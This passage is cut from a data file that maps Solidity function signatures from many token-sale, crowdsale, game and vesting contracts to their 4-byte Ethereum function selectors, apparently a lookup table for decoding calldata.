"medalIfFreeze(address)": "0x94f29cb3", "_medalUnFreeze()": "0x235422fb", "medalUnFreeze()": "0xcf5b5a77", "_medalFreeze(uint256)": "0xac22b970", "medalFreeze(address,uint256,uint256)": "0x9b78cf9c", "burnMedal(uint256)": "0x4a83cfa9", "mintMedal(uint256)": "0x12039fed", "medalTransfer(address,uint256)": "0xee9adde1", "mentalBalanceOf(address)": "0xa22ed371", "medalTotalSupply()": "0x127cc6bf", "GSUMedal()": "0x4cb5a45d", "burnWholeBalance()": "0xbbe2b727", "relocationSwitch(bool,address)": "0xa906f837", "transactionSwitch(bool)": "0x82401f06", "deliverTokensBatch(address[],uint256[])": "0xcf72085f", "relocate()": "0xb73afe4f", "recieveRelocation(address,uint256)": "0x6c464c3d", "CoinClaim(string,string,uint8)": "0xbf15e42a", "Sotko()": "0xb4ee4f81", "SMILEHEART()": "0xb6b0eaca", "MIC(uint256,string,uint8,string)": "0x782378d1", "unfreezeAccountWithToken(address,uint256)": "0xb29f9d3b", "freezeAccountWithToken(address,uint256)": "0x5c142f2b", "transferAndFreezeTokens(address,uint256)": "0xda14e3b2", "setFactory(address,address)": "0x5e825564", "Initiate(address,uint256)": "0x28b59782", "createSwap(uint256,address)": "0x7a3d4b1a", "TOSMidHoldingContract()": "0x3db1f00a", "AEFToken()": "0x9913dcbb", "globalBurnAmount()": "0xa5fbd808", "payOrder(uint256,uint256,uint256)": "0xd2a3899c", "_unlockTokenByIndex(uint256)": "0x32cce1e4", "_lockToken(uint256,uint256,uint256)": "0xee67aa5a", "getLockRecordCount()": "0x79219a24", "getLockAmount()": "0xd64c34fc", "getLockByIndex(uint256)": "0xb8697dbd", "lockTokenForNode(uint256,uint256,uint256)": "0xbaff4609", "EEFcoin(address)": "0x3ae15692", "Mino()": "0x344c5ea1", "StartreasureToken(uint256,string,uint8,string)": "0xd95c6092", "MOONCOINCONTRACT()": "0x82a18331", "changeWalletForETH(address)": "0x0434e5a6", "refund(bytes32,string,address)": "0xa307b727", "MYCCToken(uint256)": "0x717f6f7f", "isNotPaused()": "0x7acf4892", "setPause(uint8)": "0x3ff20c8a", "Earthpayment()": "0xa27411d8", "NUC()": "0x8910b070", "SPTToken()": "0xb9676e72", "getVendingInfo(uint256)": "0x05ff088c", "maxFundLimit()": "0x6ee2627b", "dataSourceAddress()": "0xd5a3b734", "MINT_ADDRESS()": "0x466c35fc", "publicationFeeInWei()": "0xae4f1198", "toggleSwap()": "0x1ff8d507", "winnerPrice()": "0xbf6ad320", "TAP_POLL_DURATION()": "0x02fc28c4", "TOKEN_THIRD_PRICE_RATE()": "0x0ee75f6b", "bankerDepositPer()": "0xc888fafd", "lastBlock_f1Hash_uint256()": "0xae32c399", "m_allowPrivileged()": "0x2090b0a8", "CollectibleIndex2()": "0x82a60a59", "raisedPreSaleUSD()": "0xdc84e79e", "ETHFundDeposit()": "0x59ba59f1", "lifetime()": "0x69d24f63", "amount1()": "0xf400fde4", "GenerationSupply()": "0x586a52e0", "start_date()": "0x27d795d7", "genesisRoot()": "0xc7033721", "softCapFundingGoalInCents()": "0x288dca30", "swappedTokens()": "0xf0425fe1", "endFirstBonus()": "0x5f68688f", "turnoff()": "0x9eeb30e6", "tokenPostIcoUsdCentPrice()": "0x8561dc0b", "baseAmount()": "0x4864d140", "crowdTarget()": "0x68a72fba", "openPreICOPublic()": "0x44188b72", "Wallet3()": "0xaaf13d10", "lockDuration()": "0x04554443", "timeslucky()": "0x73047e93", "GOV()": "0x180cb47f", "currentLoanDayTime()": "0xa35523da", "extraBonus()": "0x93ed4426", "PHOENIX_CORSAIR_EXTRACTION_BASE()": "0x252bb9c3", "ethEurRate()": "0xe5e7b82b", "SQUAD_SIZE()": "0x132ff514", "phaseOneRate()": "0x2540c420", "maximumCoinsPerAddress()": "0x85473be1", "maxICOThirdSupply()": "0xc4811a0e", "SECOND_PHASE_MAX_SPAN()": "0x15cd8e0b", "marketingProfitAddress()": "0x6511eadb", "START()": "0xba9a061a", "interestPeriod_()": "0x1ef741fd", "payFee()": "0x29610252", "priceSelectFight2Death()": "0x56c11ba3", "FT_OPERATIONAL_FUND()": "0x16ae4ec4", "maxRefererTokens()": "0x992e74a9", "finalizeEnableRefunds()": "0xbd9f8917", "ICO_PHASE1_AMOUNT()": "0xe72cba6e", "tokenCtr()": "0xaef251a7", "resetAmountBonuses()": "0x7f564472", "dailyHourLimit()": "0x2cdb0213", "JoustNum()": "0xaec7f5b2", "RATE_RATIO_SCALE()": "0x4a63864b", "allowTrading()": "0x2e5b4c43", "paymentGateways()": "0x0ac5a67f", "initialPrice()": "0x1d0806ae", "maxPreSale2Token()": "0x0e1456c0", "iconRate()": "0xc21c45e3", "updatedPrice()": "0x88e2f29b", "phase1DurationInHours()": "0x19d2993e", "bZRxTokenContract()": "0x779dec5b", "bltRetained()": "0x42071a73", "shareCycleIndex()": "0x6572ab5b", "oasisDirect()": "0x0d9f5faa", "managerETHcandidatAddress()": "0x4ebc31f3", "walletForPresale()": "0xa2554c36", "minBlockNumber()": "0x89f12d00", "spentParsecCredits()": "0x8346aa47", "dailyHash()": "0x921e1537", "Deactivate()": "0xc2a88340", "canReceiveTokens()": "0x26381b05", "Total_Gamblers()": "0xfd330b26", "Admin()": "0xff1b636d", "getRemainingPartnerTokensAllocation()": "0x44f96b36", "bonusDecreaseDay()": "0xf7658e0f", "RETHEN1()": "0xba44f6a4", "allSaleCompleted()": "0xde179108", "Chain2()": "0x91a7aa37", "totalTokensForSale()": "0x60219c7b", "removalPrice()": "0x40bf6424", "totalClosedBID()": "0xf65045df", "abstractResolver()": "0x9d770e49", "canAnyoneBurn()": "0xc8af46b4", "PAYOUT_FRAC_BOT()": "0x08306af3", "objectDoublet()": "0xbb452ea7", "handleTimedTransitions()": "0x3767aec6", "presaleLimitUnits()": "0x8b6c69e5", "w_Advisers()": "0x190bc9d4", "freeUntilDate()": "0xf93e6715", "projectName()": "0x9a33e300", "polymathRegistry()": "0x77282b70", "setPresaleTwo()": "0x96a77176", "payoutPeriodEnd()": "0xbf4aeff2", "angelCardDataContract()": "0xe2985596", "weiPerAtom()": "0x574a5e31", "investmentMin()": "0x31f4f682", "exchangeInterval()": "0xee029de1", "EEM()": "0xb9e99231", "tokensToSale()": "0x1d211d74", "_softRequire(bool,bytes32)": "0xfe229b61", "constructOwned()": "0xeb6d9fb5", "donations(bytes32)": "0xbed866f6", "stats()": "0xd80528ae", "config()": "0x79502c55", "donate(bytes32)": "0xc37067fa", "setDefaultResolver(address)": "0xc66485b2", "FireflyRegistrar(address,bytes32,address)": "0xaaec0c03", "RECFToken(uint256)": "0x13653b24", "B21Token(address,address,address,address,address)": "0x20db0c7e", "DPPCrowdsale()": "0xc7b0235b", "setCrowdsaleBlocks(uint256,uint256,uint256,uint256)": "0xee2faf74", "claimCofounditTokens()": "0xb103c1dd", "claimCoreTeamsTokens(address)": "0x91de4f88", "setMultisigAddress(address)": "0x05540534", "withdrawRemainingBalanceForManualRecovery()": "0x2165e1aa", "batchReturnEthIfFailed(uint256)": "0x7f860330", "claimEthIfFailed()": "0x7d6651b9", "pullBalance()": "0xb45aff16", "editContributors(address[],uint256[])": "0x1c8dddbd", "calculateMaxContribution(address)": "0x5f2536f7", "refundTransaction(bool)": "0xe701900c", "checkCrowdsaleState()": "0xa0c57eb4", "hash(uint256,uint256,uint256,uint256)": "0x3ae7f938", "testrc(bytes32,uint8,bytes32,bytes32)": "0xebdcc8ac", "_burnForDeposit(address,uint256)": "0xabf0661f", "_mintFromDeposit(address,uint256)": "0x2981cceb", "_fee(uint256)": "0x602e2533", "_fulfillPayment(address,address,uint256,uint256,address)": "0x2c7ec2c2", "_fulfillPreapprovedPayment(address,address,uint256,address)": "0x59ba1dd5", "setPlatformFeePer10000(uint256)": "0xf9cc2e66", "SAN()": "0x0c2ab324", "attachToken(address)": "0x406a6f60", "checkMaxCap(address,uint256)": "0x060c265f", "contributorMaxCap(address,uint256)": "0x0992e4c3", "contributorMinCap(address)": "0x361b94be", "getMaxCap(address)": "0x94a5601a", "getMinCap(address)": "0x30184635", "listAddresses(address[],uint256[],uint256[])": "0xd45bcac1", "listAddress(address,uint256,uint256)": "0x56e2eab8", "BigbomContributorWhiteList()": "0xc833d7b1", "getAirdropAmount(address)": "0x724bc3de", "getAirdropStatus(address)": "0xeed7eaea", "airdrop(uint8,bytes32,bytes32)": "0x023eff9f", "Bxcoin()": "0x0460b206", "GOC()": "0x3061d568", "HashBuxICO()": "0x7b66c032", "tokenWithdraw(uint256)": "0xd7e751ff", "DemocracyVote()": "0x7086528e", "DOCTokenSale()": "0x3bab3088", "buyTokensInternal(address)": "0x9888103f", "updatePriceAddress(address)": "0x6e8a6d12", "updateTokenPerEther(uint256)": "0xb7dfc8a5", "setMinToken(uint256)": "0x5558e1c3", "FlexibleTokenSale(address,address,uint256,address)": "0xc491fd18", "distributeTokens(address,address[],uint256[])": "0x51b6fe96", "WSKYToken()": "0xb0b53a1f", "EtherMoney()": "0xb8a582a9", "MetronomeToken()": "0xa6c4d58c", "IoTeXNetwork(uint256)": "0x04f8aa9b", "getMemberIdxOfUser(address)": "0xeee187fd", "isUserMember(address)": "0x99b1adbf", "getMemberByIdx(uint256)": "0x6b3868db", "getMembersOfTierCount(uint256)": "0x9e484dd4", "getMembersOfTier(uint256)": "0x65131f63", "getTierOfMember(address)": "0x215d6b61", "setMemberTier(address,uint256)": "0xf3a5f262", "updateExistingMember(address,uint256)": "0x27a7b827", "addNewMember(address,uint256)": "0xd0008a6d", "changeEndtime(uint256)": "0x68a9de13", "changeStarttime(uint256)": "0x1348fdcc", "startPublicsale(uint256,uint256)": "0xd7079ee7", "getTimebasedBonusRate()": "0xe7239ed2", "TLCMarketCrowdsale(uint256,uint256,uint256,address,uint256,uint256)": "0xd2591068", "getTotalAllocation()": "0x15d3b5d8", "TeamAllocation()": "0xd4dd92a9", "IlumXToken()": "0xbe8bd3df", "migration(address)": "0x685e2486", "transferLogicAuthority(address)": "0x9738f92c", "setBitSTD(address,address)": "0x654c8748", "sell(address,address,uint256)": "0xcae270b6", "buy(address,address,uint256)": "0x153e66e6", "mintToken(address,address,uint256)": "0x6bec32da", "burnFrom(address,address,uint256)": "0xec60bcf3", "approveAndCall(address,address,address,uint256,bytes)": "0x2ff42757", "migration(address,address)": "0x995fac11", "setData(address)": "0x61dfdae6", "transferDataAuthority(address)": "0x40811e90", "getOldFrozenAccount(address)": "0x7169afa6", "getOldAllowance(address,address)": "0xaa4d4213", "getOldBalanceOf(address)": "0xb5ec85f0", "setFrozenAccount(address,bool)": "0x45b7d5da", "setBalanceOfAddr(address,uint256)": "0x464e1d46", "transferAuthority(address)": "0x3078db6c", "multiMerge(address[])": "0xd8085fee", "merge()": "0x0b65108b", "checkForUpdates()": "0x427ac5e4", "update(address,bool)": "0xea84bfee", "Ohni(uint256,string,uint8,string)": "0xf1508105", "getCurrentTrancheIndex(uint256)": "0xaf4a822d", "increaseApprovalWithData(address,uint256,bytes)": "0x7fcfb422", "approveWithData(address,uint256,bytes)": "0x7b5eb564", "transferFromWithData(address,address,uint256,bytes)": "0xee532f31", "transferWithData(address,uint256,bytes)": "0x2535f762", "sBitcoin()": "0x0d8693bd", "ContribToken(uint256,string,string)": "0x814e3bd3", "callData(address,bytes)": "0x42e86d27", "mintEGAS()": "0xd1802d79", "GOTokenCrowdsale()": "0x8c8df7cd", "calculateAndTransferTokens(address,uint256)": "0xaf250a5e", "tokenOperationsFinished()": "0x56930b55", "finishITO()": "0x14c292ca", "payExtraTokens(uint256)": "0x453dfcae", "setExtraTokensPercent(uint256)": "0xdab5cec2", "setMaxInvestedLimit(uint256)": "0x1fd41949", "tokenHoldersCount()": "0x4787513a", "VIRALTOKEN()": "0x5785b3f9", "ValueCyberToken()": "0x7aec2277", "efwtest()": "0x516cbe1a", "WithdrawProfit(address,uint256)": "0x010d214e", "stopPurchaseTokens()": "0x5251a343", "startPurchaseTokens()": "0xe38138a2", "setSaleRate(uint256)": "0xeef73ebb", "takeTokens(address,uint256)": "0xe4ad9a18", "transferWholeTokens(address,uint256)": "0xa1581821", "ERC()": "0xb0b24e2c", "CocaCola()": "0x0ad59fa2", "set_burned(uint256)": "0xa962a7d6", "set_mint(uint256)": "0xccf12304", "set_foundtion_addr(address)": "0x7bb305ef", "WIZISHOPPINGCOIN()": "0x0109057e", "AmazonBestsellerLabs(uint256,string,uint8,string)": "0x8b9847a5", "coreERC()": "0xfc416159", "HHDToken()": "0x20614514", "WZCoinToken()": "0x95c55798", "HeyfanToken()": "0x3ce5facd", "GrandFraternityChain(uint256,string,string)": "0x9151c7e4", "mint(uint256,string,bytes)": "0x785cc997", "COMETUBU()": "0xad8b4698", "setPublicOfferDate(uint256,uint256,uint256)": "0x4a7084bb", "setPublicOfferLimit(uint256,uint256)": "0xcc00814d", "setPublicOfferPrice(uint256,uint256)": "0x35490ee9", "ZeroxDinar()": "0xaa799fdc", "setDisable(address,bool)": "0xa6ddce13", "setAllocation(address,uint256,uint256,uint256,uint256)": "0x6d290d34", "totalUnClaimed()": "0x39694f47", "removeVestingAdmin(address)": "0xf3dbaf0d", "addVestingAdmin(address)": "0xfb14f058", "BankingPayToken()": "0xe1e471eb", "DMI()": "0x862cb14e", "deployVestingContract(address,address,uint256,uint256,uint256,bool)": "0x7ce56303", "deployDefaultVestingContract(address,uint256)": "0x61a3a281", "MinerChain()": "0xf21aaee6", "Mariton()": "0xca0d6e48", "AWAToken()": "0x3ce32c0a", "NFXCoinToken()": "0xcc6c8e31", "Ethereumt()": "0xc36de353", "printContent()": "0x891d4fe8", "setFixes(string,string)": "0x4b798b82", "setContent(string)": "0x3be8fd6a", "updateUserDetailsInBulk(address[],uint256[],uint256[],uint256[])": "0x31378811", "updateSignedDealsCount(address,uint256)": "0xbefcc34d", "registerUser(address,string,uint256,uint256,uint256)": "0xbeca159b", "CLVRCrowdsale()": "0x18d32128", "withdrawBalanceDifference()": "0x0b82d33d", "WrapperLock(address,string,string,uint256,address,bool)": "0x247534cf", "getRequest(address,uint256)": "0x726d0a28", "getUserRequestCount(address)": "0xc166c458", "addRequest(address,address,bytes32)": "0x9eef6f65", "notarizeHash(uint256,string,string,bytes32,string,string,string)": "0x5cba6caa", "getKeyPrice()": "0xa440a190", "getUserDivs(address,uint256)": "0x1b72194f", "buyRef()": "0xcc9ba6b2", "finishGame()": "0x9fecb69f", "chkBSize(uint256,uint256)": "0x28d2a961", "IdolToken1()": "0xfce3b91e", "PROCOIN()": "0xea048256", "removeFromInxWhitelist(address)": "0x4dab54fd", "addToInxWhitelist(address)": "0xae622c4b", "removeFromKyc(address)": "0x883462ca", "addManyToKyc(address[])": "0xbb36ef7b", "addToKyc(address)": "0x9bd69528", "BUBBLEToken()": "0x6b87d9f7", "manualWithdrawToken(uint256)": "0x5d22a352", "createTokensWithoutReffer()": "0x178af534", "NVISIONCASHTOKEN()": "0x7eb60591", "HANDLE()": "0x3f60efa2", "unlockAddr(address)": "0xf8cf0e1c", "getAllLockerInfo()": "0xbca7bd85", "getLockerInfo(address)": "0xc2add678", "setNewlockAccount(address,uint256,uint256)": "0x87c05510", "distributeTokenAndLock(address,uint256,uint256)": "0x381db641", "disTrustDealer(address)": "0x62e6e7c7", "trustDealer(address)": "0x07d31642", "EDMToken(address,uint256)": "0xc20a6ae9", "EFARMCoin()": "0x920dfe52", "SpinTestToken()": "0xaad83ab3", "withdrawDifferentToken(address,bool)": "0xd9ee369a", "YWBToken()": "0x2feee782", "get_appuration(uint8)": "0xf51b793a", "remainingARXSupply()": "0x279029b3", "initialARXSupply()": "0x8e62c982", "ARXCrowdsale()": "0x07baa3db", "getVideoGameOwner(uint256)": "0xab22a640", "modifyGameItemPrice(uint256,uint256)": "0x6ee3d453", "_createGameItem(string,address,uint256,uint256)": "0x83917229", "_transferDivs(uint256,uint256,uint256)": "0xc722e113", "getGameItem(uint256)": "0x94f13f4a", "createContractGameItem(string,uint256)": "0x5db42841", "createPromoGameItem(address,string,uint256,uint256)": "0xdb57c429", "GameItemNew()": "0x6cb942ab", "PI_EDIT_3()": "0x8d65095e", "reclaimBalanceTokens()": "0x9b28f75a", "reclaimAllocated()": "0x7afff425", "releaseFounderTokens()": "0x89b68f40", "extendCrowdsale(uint256)": "0x71d5afb5", "releaseReservedTokens()": "0x70101735", "approveAllocation(address)": "0xb052852f", "doPreAllocations()": "0x5aae843e", "_allocateTokens(address,uint256)": "0x637b2541", "IICToken(uint256,string,string)": "0xbf0dc1c0", "ICOactive()": "0x587d6a20", "RedeemOraclize(uint256)": "0xb7840731", "RefillOraclize()": "0xc3d9820d", "UpdateUSDETHPriceAfter(uint256)": "0x75698524", "releaseUnclaimedFunds()": "0x1e217bf8", "depositFunds()": "0xe2c41dbc", "increaseSupply(uint256,address)": "0x124fc7e0", "vault_refund(address)": "0xc854db91", "vault_enableRefunds()": "0xd18df96c", "vault_releaseDeposit()": "0x655fc4db", "vault_deposit(address,uint256)": "0x6eec21d6", "RubyCoin()": "0xb021cace", "AQI()": "0x18a66563", "setEtheraffle(address)": "0x79cb5a2f", "EtheraffleDisbursal(address)": "0xd3313802", "ownerBurnToken()": "0xc245c1bc", "DGXCrowdsale(address,address)": "0x25bddc18", "getInt8FromByte(bytes14,uint256,bytes1)": "0x1f6034fd", "getByteFromBytes14(bytes14,uint256,bytes1)": "0x7216ab38", "FructusToken()": "0x3f265ddd", "TTGCoin()": "0xa6666f0f", "enableMint()": "0x44b28d59", "recycle(address,uint256)": "0x5d36d182", "setMaxTranferLimit(uint256,uint256,uint256)": "0x12136918", "calculateCrowdAmount(uint256)": "0xc141ed74", "switchCrowdState()": "0x8c64eb4f", "crowdDistribution()": "0x4efeb2cf", "distributeToDev(address,uint256)": "0x0f67f3f7", "distributeToFound(address,uint256)": "0x185917c5", "setDistributeAgent(address)": "0xb60ffa9c", "removeFound(address)": "0xd3e6dda7", "addFound(address)": "0x0bc311ea", "removeDeveloper(address)": "0x9e23c209", "addDeveloper(address)": "0x22fbf1e8", "isFounder()": "0x39478568", "isDeveloper()": "0x79a8945c", "Prismacoin()": "0x424fa9ec", "CatholicCoin()": "0x1ccd2706", "ecverify(bytes32,bytes)": "0xe47c5902", "verifyBalanceProof(address,uint256,bytes)": "0xffb171fb", "remit(address,uint256,bytes)": "0xda9eadac", "Choon(address,address,address)": "0xcf0a07b2", "addToActiveGroup(address)": "0x6859d08f", "Notes(address,address)": "0x6d9218e5", "unverifyAccount(address)": "0xc2db26fc", "setManyAccountsVerified(address[])": "0xe071681d", "setAccountVerified(address)": "0x9075f124", "isAccountVerified(address)": "0x8ba209b6", "isAccountWhitelisted(address)": "0x8907e787", "_deliverWhitelistBonus(address)": "0xe050674c", "getReferral(address,address)": "0x22529fff", "delReferral(address,address)": "0x5a93bf71", "getBountyAmount(address,address)": "0x978afdc8", "delBounty(address,address,uint256)": "0xaf4b3cab", "addBounty(address,address,uint256)": "0x490fea4d", "claimBountyToken()": "0x14aa0eaa", "_getTokenAmountWithoutBonus(uint256)": "0xca2acfff", "enableTokenSale()": "0x39a13fb3", "addStage(uint256,uint256,uint256,uint256,uint256,uint256)": "0xdf6ee6b7", "setupBounty(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x51eecc23", "ACATokenSale(address,uint256,uint256,uint256,address)": "0xee362d3d", "setRate(uint256,uint256)": "0x46df2ccb", "setSalePeriod(uint256,uint256,uint256)": "0xec9723ad", "getSales(address)": "0xe16bd3b7", "getRateWithoutBonus()": "0x5c06d880", "getSold(uint256)": "0xff597790", "getCurrentSold()": "0x0b9ea6c8", "getCapacity(uint256)": "0xbcd5349f", "getCurrentCapacity()": "0xaba89198", "getClosingTimeByStage(uint256)": "0x3bc578fe", "getClosingTime()": "0x2f9cb9aa", "getOpeningTimeByStage(uint256)": "0x1f5c6f67", "getOpeningTime()": "0xd7463573", "getTotalTokenSold()": "0x2ecd7020", "isEnabled()": "0x6aa633b6", "balanceOfOwner()": "0x4975d202", "manageTransferLock(address,bool)": "0x9041f960", "transferLock()": "0x73124ced", "isTransferable()": "0x2121dc75", "ETHCollector()": "0x2f91822c", "storageTime()": "0x96fe1338", "ReleaseFundsAndTokens()": "0x428be33f", "address2a()": "0x13e8e5d2", "getWinTokenAmount()": "0x282651fe", "MANAGER_SUPPLY()": "0xf2bea1fc", "lastBlock_a19Hash_uint256()": "0x976f6c92", "minRevenueToDeliver()": "0x0ce4c990", "redeemToken()": "0x2f310bad", "token_creation_cap()": "0x8db1296d", "stageLength()": "0x4dbbfcc6", "oldController()": "0x29eae797", "earlyBackersAmountLeft()": "0xd3e3623b", "decimalFactor()": "0x6d6a6a4d", "removeHatchingTimeFee()": "0xa4d5e30e", "startIcoPreICO()": "0xd1eca85e", "maxplayers()": "0x6ba20015", "buyTokensPreSale()": "0x74b9f229", "bountyOnlineWallet()": "0xb9a68300", "burnerOwner()": "0x8ace1732", "MAX_STANDARD_SALE_PACKS()": "0xac280cb9", "burntBounty()": "0x9944d5e7", "stage1_start()": "0xb2e94e78", "lastAccountNum()": "0x7e7db227", "feeBurnerWrapperContract()": "0x7a90a7a3", "referrer()": "0x68447c93", "tokenCreationMinMile2()": "0xc0abf829", "raceCount()": "0x8ba5807c", "swapEndTime()": "0xefebc720", "foundersAddress()": "0xebfdc657", "expirationTime()": "0xda284dcc", "isPayableEnabledForAll()": "0xa7261f79", "presaleContract()": "0x63d9df85", "buyShares()": "0xd9527fa7", "UNLOCK_TEAM_1()": "0x54b9b4fa", "_ownerWallet()": "0x4825fc0d", "transferFeeDenominator()": "0xd42cfc41", "bonusLevel0PercentModifier()": "0x4eef440c", "managementTokenAllocation()": "0x6e506ee4", "burnAddr()": "0xd246d411", "fundsRaisedInWei()": "0x949eabff", "maxWagerWei()": "0x1ed01f61", "receivingAddress()": "0x1db87be8", "nbBackerWithMoreOrEqualTen()": "0xf7cc8f40", "allocate1ProjectToken()": "0x43c9a189", "beneficiaryWithdrawal()": "0x3686ca3e", "partner2_vows()": "0xeb2c87a4", "FoundationAddr_()": "0x0dc9ebfe", "ecosystemBuildingWallet()": "0xaf3dc180", "icoMaxAmount()": "0x0309922f", "evidenceInterval()": "0x42c1ea29", "isProposalActive()": "0x8672f1bc", "PhoenixFundDeposit()": "0x7efe0e76", "totalSyndicateShares()": "0x355255f5", "crowdsaleEndedTime()": "0xf3a5644d", "mrk_contract()": "0x95040933", "BONUS_TIER3()": "0x8160b246", "foundersTokensWallet()": "0x4a23418a", "proofVerifyFailed()": "0x175466ee", "expPercentage()": "0x2c2da3cf", "latpToken()": "0x52512599", "teamReserveTimeLock()": "0x5ffabbce", "endTimePreIco()": "0xfbdeecab", "maxTicket()": "0xb1bb5855", "isMinimumValue()": "0xa4dd73cd", "relativeDateSave()": "0x5ffbba3f", "AVAILABLE_FOR_EARLY_INVESTORS()": "0x060c7f33", "CROWDSALE_PRICE()": "0xa86416e2", "appAccountsLength()": "0x437fa667", "runIco()": "0x5daab236", "southadvisor()": "0x662959cc", "_maxSupply()": "0x22f4596f", "spender()": "0xe8edc816", "transferProposalEnd()": "0x5f0f1f85", "lastweek_winner1()": "0x9ff9007d", "openWeek()": "0x2493d006", "startTimeNumber()": "0xe062aff8", "fshare()": "0xd0a8c801", "numOfConfirmationNeeded()": "0x81ded5b8", "SALE_FUND()": "0xa207b7fa", "canUpdateFrontWindowAdjustmentRatio()": "0x92ae0530", "winAmount5()": "0x8fd57396", "poissonData()": "0x12d1b19a", "hicsTokenPrice()": "0x9f03c3b8", "holdersAllocatedAmount()": "0x7850c2ac", "defaultResolver()": "0x828eab0e", "turnLast()": "0xc4c24249", "ethEt4Rate()": "0x59197f51", "raffle_balance()": "0x82f16872", "m_walletAddress()": "0x815f73f0", "contractExpirationTime()": "0x5281bbe9", "totalTransferred()": "0x9b087b2d", "leader_3()": "0xa27d8298", "publicAllocationTokens()": "0x903d0ac0", "mintAmount()": "0x5a2bcc18", "token_sale_start_block()": "0xbecb44da", "earlyAllocation()": "0x5f304615", "getMin(uint64[])": "0x13a110b4", "withdrawTokenToFounders()": "0x241673e8", "icoProceeding()": "0x585a9385", "isRoundTwoSalePeriod(uint256)": "0xc565eba6", "isRoundOneSalePeriod(uint256)": "0xed724103", "isPreSalePeriod(uint256)": "0xf80979d6", "zeroSub(uint256,uint256)": "0x6e48670f", "NetkillerToken(uint256,string,string,uint256)": "0xfb6cae8e", "MdedicalChainCoin()": "0xd8cecc7b", "isApprovable(address,uint256)": "0x8a0520fb", "setContract(address,address,address)": "0x29291054", "EtheremonAsset(address,address,address)": "0x991d79b5", "isOnTrading(uint64)": "0xa847a71c", "isOnBattle(uint64)": "0x35f097f3", "BYBToken()": "0xcbe37e25", "Vidnix()": "0x4fe5c2b4", "CurryCoin()": "0xc81a7d10", "setUserID(bytes32)": "0xc3262dfd", "saleActive()": "0x68428a1b", "getRateAt(uint256)": "0xb52e0dc8", "getCurrentTimestamp()": "0x6c9230db", "supply()": "0x047fc9aa", "CobinhoodToken()": "0xf75316b4", "burnDNC(address,uint256)": "0x9670078c", "mintNewDNC(address,uint256)": "0x71ced69d", "adminTransfer(address,address,uint256)": "0xda72c1e8", "deleteMintable(address)": "0xfeb7267b", "createNewMintableUser(address)": "0xaffcba25", "GoldBank()": "0xfbf9dc12", "LegalBot()": "0xa681bf23", "AirdropTokensHolder(address,address,address)": "0xe74a19fa", "doCreate(uint256,bytes)": "0xf217f15c", "ONEPAY()": "0x30f7f148", "setICO_Contract(address)": "0xd972bc59", "releaseToken()": "0xec715a31", "ExcreteumToken()": "0x2ad3509b", "calculateMyReward(uint256)": "0x3f8df98d", "calculateMyRewardDecreased(uint256,uint256)": "0x140b2cdd", "transferReward(address)": "0x8c93256e", "calculateMyRewardMax(address)": "0x90addc9a", "setGoldMigrated(address,bool,string)": "0xeff413ad", "isGoldMigrated(address)": "0x82bb326b", "migrateGold(string)": "0x44495d7e", "setMntpMigrated(address,bool,string)": "0x661aba0d", "isMntpMigrated(address)": "0xfe4259e3", "migrateMntp(string)": "0x33e90f98", "destroyMe()": "0x0c7caded", "pauseMigration()": "0xac700e63", "lockGoldTransfers(bool)": "0x93fa47f1", "lockMntpTransfers(bool)": "0x49440b91", "GoldmintMigration(address,address)": "0x7637a12e", "getGoldMigration(uint256)": "0x46bc29bf", "getMntpMigration(uint256)": "0xf56311d7", "getTotalBurnt()": "0x9f5a9b7c", "getTotalIssued()": "0x8db9653f", "rescueAllRewards(address)": "0x08bddf32", "transferRewardWithoutFee(address,uint256)": "0xa7eb3848", "finishMigration()": "0x88d761f2", "setGoldFeeAddress(address)": "0x1bf0635b", "setGoldmintTeamAddress(address)": "0xa66c0b1c", "setMigrationContractAddress(address)": "0x300c3091", "setStorageControllerContractAddress(address,address)": "0x12c3ee37", "lockContract(bool)": "0x897cceee", "setCreator(address,address)": "0xf41440d9", "Gold(address,address,int256,address)": "0xc14c5574", "isAddressExcept(address,address)": "0x8cf3e683", "removeExceptAddress(address,address)": "0x5891c8aa", "addExceptAddress(address,address)": "0xa31e3678", "getMax(uint256)": "0xe688f89d", "getMin(uint256)": "0x6af58d83", "GoldFee()": "0x992204e6", "calculateFee(address,bool,bool,uint256,uint256)": "0x9cfad128", "Labereon()": "0xe5c0de3e", "setup(uint256,uint256)": "0x0a8fed89", "is_empty()": "0x3c121ef5", "ChiTrader()": "0x15136fb5", "_computeFee(uint128)": "0xe063a439", "_transfer(address,uint40)": "0xe8a55471", "_escrow(address,uint40)": "0x15cec355", "_isOwner(address,uint40)": "0x7b9504d5", "setFee(uint16)": "0x8e005553", "setup(address,uint16)": "0xe410a0c6", "runSigned(uint40,uint256,address)": "0x9652713e", "run(uint40,uint256,address)": "0xa055d455", "onRemove()": "0x11952369", "isPluginInterface()": "0x94a89233", "checkIfCurrentlyActive(uint256)": "0x41eddf00", "nProposals()": "0x3bd5aceb", "getActiveProposals()": "0x5584c4f9", "getApprovedProposals()": "0x3ac0feac", "getNotApprovedProposals()": "0x285f2346", "denyProposal(uint256)": "0x271c34d7", "approveProposal(uint256)": "0x98951b56", "ProposalManager()": "0x9405b406", "releaseTeamTokensAfter24Months()": "0x408a8094", "releaseTeamTokensAfter18Months()": "0x6698f141", "releaseTeamTokensAfter12Months()": "0x625bc37b", "releaseTeamTokensAfter6Months()": "0x2e4040b0", "BitUPToken()": "0x9aab0c7a", "changeTokenOwner()": "0x262199c3", "finishPreSale()": "0x39885b23", "PreSale(uint256,uint256,address,address,uint256)": "0x3268419f", "increaseDividendPayments(address,uint256)": "0x72fdbf25", "getSourceConstraint(int256,uint256,uint256,uint256)": "0x610d006c", "getSourceValue(uint256,uint256,uint256)": "0x1e737709", "getSourceHash(uint256,uint256,uint256)": "0x6c4ceaff", "addSourceForTimeline(uint256,uint256,string,bool)": "0xe235847a", "addSourceForBudget(uint256,uint256,string,bool)": "0xe9b04e69", "distributeWei(uint256,uint256)": "0xaa985a63", "init(uint8,uint256,uint256,uint256,address[2],address[],uint256)": "0x18deb066", "RICOStandardPoD()": "0x3682905e", "forceOwnerChange(address)": "0x0cb0c7f0", "disown()": "0x1e9bf0da", "assinaPresenca()": "0x05d473da", "registraAluno(address)": "0x3931845d", "Presenca()": "0xa15a9a15", "getSaleContractTokensMinted(address)": "0x4db08e5b", "getSaleContractTokensLimit(address)": "0xff5bc8a7", "getSaleContractEndBlock(address)": "0xf2ccaed5", "getSaleContractStartBlock(address)": "0x25112743", "getSaleContractDepositAddressVerified(address)": "0xef7c7797", "getSaleContractDepositAddress(address)": "0x6932c9c5", "getSaleContractDepositEtherMax(address)": "0x17b83aa6", "getSaleContractDepositEtherMin(address)": "0xbf7035c3", "getSaleContractTargetEtherMax(address)": "0xc11301d4", 